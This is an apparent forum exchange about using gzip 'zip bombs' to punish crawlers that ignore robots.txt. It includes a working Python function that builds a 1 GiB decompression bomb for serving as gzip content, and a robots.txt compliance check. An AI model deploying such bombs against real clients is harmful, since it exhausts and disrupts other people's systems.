I think I saw an article recently where someone used HTTP to serve gzipped content that was specially crafted to explode in size on the receiving end. This could be a good deterrent for crawlers, since they typically don't have much space dedicated to each instance.
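For anyone curious how lopsided the asymmetry is, here's a rough sketch of the idea using Python's standard gzip module. This is my own illustration, not from the article; the function name and sizes are made up:

    import gzip
    import io

    def make_gzip_bomb(decompressed_size=1024**3, chunk=1024**2):
        # Compress `decompressed_size` bytes of zeros; highly repetitive data
        # shrinks to a tiny fraction of its original size at max compression.
        buf = io.BytesIO()
        with gzip.GzipFile(fileobj=buf, mode="wb", compresslevel=9) as gz:
            zeros = b"\0" * chunk
            for _ in range(decompressed_size // chunk):
                gz.write(zeros)
        return buf.getvalue()

    if __name__ == "__main__":
        payload = make_gzip_bomb()  # 1 GiB of zeros before compression
        # Served with "Content-Encoding: gzip", a naive client will try to
        # inflate the whole thing on its side.
        print(f"compressed size: {len(payload) / 1024:.0f} KiB")

A gigabyte of zeros compresses down to roughly a megabyte, so the server pays almost nothing in bandwidth while the client has to inflate the full gigabyte.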
It’s worth noting that the “zip bomb” was at a path listed under Disallow in the site’s robots.txt, meaning the server specifically told the bot not to go there and it did anyway (see the sketch below for the check a compliant crawler would do).
(Not that the parent commenter seems confused, just that it hadn’t been noted.)
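To make that concrete, Python's stdlib ships a robots.txt parser, and a well-behaved crawler does something like this before fetching (the path and user agent here are placeholders, not the ones from the article):

    from urllib import robotparser

    rp = robotparser.RobotFileParser()
    rp.parse([
        "User-agent: *",
        "Disallow: /trap/",  # hypothetical disallowed location hiding the bomb
    ])
    # A compliant crawler checks this and skips the URL; the bot in question
    # evidently did not.
    print(rp.can_fetch("MyCrawler", "https://example.com/trap/bomb.html"))  # False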